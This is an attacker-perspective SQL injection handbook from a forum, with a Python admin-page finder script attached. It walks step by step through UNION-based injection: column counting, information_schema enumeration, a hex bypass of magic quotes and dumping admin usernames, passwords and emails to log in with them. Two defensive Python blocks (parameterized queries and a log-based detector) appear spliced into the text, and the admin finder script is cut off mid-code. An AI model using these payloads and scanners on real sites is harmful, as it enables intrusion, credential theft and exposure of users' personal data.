Taku's SQLi handbook #1
Introduction
I couldn't find any SQL injection tutorials on here, so I decided to create one.

I know that this is probably going to be posted in the PHP and SQL Injection Attack Preventions section, but this tutorial is not just going to be about how to protect yourself.
In order to really understand how it works you have to think like an attacker, and that's why I'm going to explain this from the perspective of a malicious hacker.

This handbook is just for educational purposes, and I do not take responsibility for anything stupid you might do with the information I'm about to give you.

What is SQLi?
SQLi, or SQL injection, is a vulnerability that occurs when user input is not sanitized and ends up being interpreted as part of a complete SQL query.
Keep in mind that this is just a brief explanation; there are a number of other places where SQL injection can happen, such as forms and search boxes, and the list goes on.
For instance, take this example. You have a website where you want to grab text from an SQL database and display it on a page.

URL:
Code:
http://www.website.com/news.php?id=1
Query:
Code:
select title, text from news where id=$id
As we can see here the ID is a variable, and is shown in the URL too.
If you change the ID to 2, the application goes to the database and selects the title and text from the news table where the ID is 2.

Now, this is how it's supposed to work. However, if we put a single quote at the end of the URL like this:
Code:
http://www.website.com/news.php?id=1'
The code will now look like this:
Code:
select title, text from news where id=1'
Now, because this quote is not sanitized, it breaks the whole SQL query, and the website shows an SQL error like this:
Code:
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
This means that you can actually run SQL against the database, meaning you can SELECT (read data from tables), INSERT (add rows), UPDATE (edit rows), DELETE (delete data, but keep the table structure) or DROP (remove both the data and the table structure).
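To make the mechanism concrete from the defender's side, here is an added example (not part of the handbook) that reproduces the news lookup above against a constructed in-memory SQLite table. The vulnerable function pastes the URL parameter into the query text exactly as the `where id=$id` snippet does, so `1'` produces the syntax error the page shows; the two hardened variants bind the value as a parameter and, additionally, enforce that the id is an integer. The table name, rows and function names are all assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the handbook's "news" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, text TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "First post", "Hello"), (2, "Second post", "World")],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    # Mirrors the page's query: the URL parameter becomes part of the SQL text,
    # so a stray quote (or anything else the user types) is parsed as SQL.
    query = "select title, text from news where id=%s" % user_id
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    # Hardened form: the value is bound as a parameter. The engine receives the
    # query shape and the value separately and never parses the value as SQL,
    # so "1'" is simply compared against the id column and matches nothing.
    query = "select title, text from news where id=?"
    return conn.execute(query, (user_id,)).fetchall()


def safe_lookup_typed(conn, user_id):
    # Belt and braces: the id is an integer by contract, so reject anything
    # that does not parse as one before it gets anywhere near the database.
    try:
        numeric_id = int(user_id)
    except ValueError:
        return None  # the web layer should answer 400 Bad Request here
    return safe_lookup(conn, numeric_id)


def demo():
    """Run the three lookups with a normal id and with the page's 1' probe."""
    conn = make_db()
    results = {"normal": vulnerable_lookup(conn, "1")}
    try:
        vulnerable_lookup(conn, "1'")
        results["quote_vulnerable"] = "no error"
    except sqlite3.OperationalError as exc:
        # This is the syntax error the handbook shows the site leaking to the browser.
        results["quote_vulnerable"] = "error: %s" % exc
    results["quote_safe"] = safe_lookup(conn, "1'")
    results["quote_typed"] = safe_lookup_typed(conn, "1'")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-16s %r" % (name, value))
```

The point of the error message leaking is that it confirms the concatenation is happening; binding parameters removes that signal entirely, and the integer check means malformed ids never reach the query at all.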

Usually what people are after when doing this is to get their hands on sensitive information like usernames, passwords, emails, SSNs, or anything else of that nature.

Manual SQL Injection
This is when we use the SQL errors to our advantage to retrieve information from the database.
To do this we need a vulnerable website; I'll use http://www.website.com/ from the example above.

So, we already know it's vulnerable because we get the SQL error by adding a single quote.
Now we're going to extend this SQL query with our own SQL code, trying to find the right number of columns.

First we're going to try this:
Quote:http://www.website.com/news.php?id=1 order by 10--
If we didn't get an error, we increase 10 to, let's say, 15.

Quote:http://www.website.com/news.php?id=1 order by 15--
If we get an SQL error saying "Unknown column '15' in 'order clause'", we have to decrease it.
Just keep doing this until you find the right number of columns.

Quote:http://www.website.com/news.php?id=1 order by 11-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 12-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 13-- // No Error
Quote:http://www.website.com/news.php?id=1 order by 14-- // Error
Because we received an error at 14, we know that the right number of columns is 13.
Now that we have the number of columns, we are going to use union to find the vulnerable columns.

We do this by entering this in the URL:
Quote:http://www.website.com/news.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
Please note that you are going to change the numbers depending on how many columns you had, so if you had 7 columns on your target your URL would be:
Quote:http://www.website.com/news.php?id=-1 union select 1,2,3,4,5,6,7--
If it's working you should see some numbers on the target's website. These are the vulnerable columns.
If you got a 3 on the target site, for example, you're going to put this in your URL.
Quote:http://www.website.com/news.php?id=-1 union select 1,2,group_concat(schema_name),4,5,6,7 from information_schema.schemata--
You basically just replace one of the numbers of the vulnerable columns with group_concat(schema_name), and make sure to add from information_schema.schemata-- after the URL.

Now you should hopefully have the database name, copy and paste this somewhere - you're going to need this.

Next you want to get the table names. You can do this by entering this in the URL.

Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
This will give you the different table names. Here you'll look for sensitive information like "login", "admin", "customers", etc. Really anything that could be of interest. If it's a target website you might as well dump the whole database's tables.

After you've found the one you want to look further into, like "admin", go ahead and write this in the URL. This will find the column names.

Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin"--
Please note that you have to change "admin" to whatever table name you're looking for. This could be anything really, even in different languages if your target is not in English.
Note: If this does not work and you get an error, it means that the server has Magic Quotes on.
To bypass this you can use any hex/char converter, I like to use http://www.swingnote.com/tools/texttohex.php for this.

Just copy the name of the table you're trying to get the columns from, paste the name in the "Say hello to my little friend" box and press "Convert".

Now copy the hex string and replace that with table name in the URL. Make sure you add "0x" in the beginning of your hex string.
This tells the server that the following characters/numbers written are a part of a hex string.

Your URL should look something like this now.

Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
Now you should see a list of the column names, such as usernames, passwords, emails, IDs, MD5 hashes or anything else that looks interesting.

Now we are almost finished. You just have to fetch the data from the columns you want to see.
Let's say I want to see the data in usernames, passwords and emails, and that the database name I found earlier was "sql_database". This is where the database name comes in handy!

Type this in the URL.

Code:
http://www.website.com/news.php?id=-1 UNION SELECT 1,group_concat(usernames,0x3a,passwords,0x3a,emails),3,4 FROM sql_database.Admin--
In this string "0x3a" is actually the hex of a colon (:).
We add this so we can see the data a little easier. It'll group the data together like so: username:password:email.

Now, if you've done everything correctly you should have the admin username, password and email. Save this somewhere and use it to log in.
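Everything from the single-quote probe through the information_schema queries above leaves a very recognisable trail in a web server's access log, which is what a defender should be watching for. The following added example (not part of the handbook) parses a few constructed Apache-style log lines, which mirror the probes walked through above with invented IPs, and flags each stage of the enumeration with a simple signature set; the rule names and log format are assumptions for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines. The addresses are documentation ranges;
# the requests mirror the probes described above, plus two ordinary page views
# so the detector has something it must leave alone.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=1%27 HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /news.php?id=1%20order%20by%2014-- HTTP/1.1" 200 812
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=-1%20union%20select%201,2,3,4-- HTTP/1.1" 200 4310
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4+FROM+information_schema.tables+WHERE+table_schema=database()-- HTTP/1.1" 200 4390
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /news.php?id=2 HTTP/1.1" 200 5088
"""

# Apache combined-style line: ip, two dashes, [timestamp], "METHOD path PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic signatures applied to the URL-decoded query string. Each maps to a
# stage of the manual enumeration described above; tune them to your own app,
# since a legitimate search parameter can occasionally contain "order by".
RULES = [
    ("quote_probe", re.compile(r"=\s*-?\d*'(\s|&|$)")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\s*\.", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-fA-F]{6,}\b")),
    ("comment_terminator", re.compile(r"(--|#)\s*$|/\*")),
]


def parse_line(line):
    """Return (ip, path, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))


def classify(path):
    """Return the names of every rule that fires on the request's query string."""
    query = unquote_plus(urlsplit(path).query)  # handles %27, %20 and '+' encodings
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text):
    """Return (ip, path, status, rules) for each request tripping at least one rule."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, status = parsed
        rules = classify(path)
        if rules:
            findings.append((ip, path, status, rules))
    return findings


def probes_per_ip(findings):
    """Count flagged requests per source address; a climbing count is the signal."""
    return Counter(ip for ip, _, _, _ in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, path, status, rules in hits:
        print("%s %s %d %s" % (ip, path, status, ",".join(rules)))
    print(probes_per_ip(hits))
```

A single `quote_probe` hit is noise on a busy site; the same address walking through `order_by_enum`, then `union_select`, then `schema_enum` within a minute is the enumeration sequence described above and is worth an alert on its own, independent of whether the responses were 200s.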

Sometimes the admin page is hidden on websites, so you might have to run different perl/python scripts to find it. Basically what such a script does is go through common directories and file names looking for an admin page.
I suggest using Cyb3rw0rm's perl admin finder. It goes through a lot of different categories, and with some luck you're bound to find a file.

admin.perl
Code:
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
#
#################################################################
#  ______    ____    ____                                       #
#  |   _  \   \   \  /   /                                      #
#  |  |_)  |   \   \/   /                                       #
#  |   _  <     \_    _/                                        #
#  |  |_)  |      |  |                                          #
#  |______/       |__|                                          #
#                                                               #
#   ______      __   _____               ____       __  ___     #
#   / ____/_  __/ /_ |__  /______      __/ __ \_____/  |/  /    #
#  / /   / / / / __ \ /_ </ ___/ | /| / / / / / ___/ /|_/ /     #
# / /___/ /_/ / /_/ /__/ / /   | |/ |/ / /_/ / /  / /  / /      #
# \____/\__, /_.___/____/_/    |__/|__/\____/_/  /_/  /_/       #
#      /____/                                                   #
#################################################################

import httplib
import socket
import sys


try:
   print "\t################################################################"
   print "\t#                  ADMIN FINDER TOOL                           #"
   print "\t#                        VISIT                                 #"
   print "\t#        http://www.facebook.com/BackTrack.Fan.Page            #"
   print "\t#                                                              #"
   print "\t#                                       Written by Cyb3rw0rM   #"
   print "\t################################################################"
   var1=0
   var2=0

   php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']

   asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']

   cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']

   js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js']

   cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']

   brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
   
   try:
       site = raw_input("Web Site for Scan?: ")
       site = site.replace("http://","")
       print ("\tChecking website " + site + "...")
       conn = httplib.HTTPConnection(site)
       conn.connect()
       print "\t[$] Yes... Server is Online."
   except (httplib.HTTPResponse, socket.error) as Exit:
       raw_input("\t [!] Oops Error occured, Server offline or invalid URL")
       exit()
   print "Enter site source code:"
   print "1 PHP"
   print "2 ASP"
   print "3 CFM"
   print "4 JS"
   print "5 CGI"
   print "6 BRF"
   print "\nPress 1 and 'Enter key' for Select PHP\n"
   code=input("> ")
       
   if code==1:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in php:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("[/] The Game Over; Press Enter to Exit")


   if code==2:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in asp:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("The Game Over; Press Enter to Exit")

   if code==3:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in cfm:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
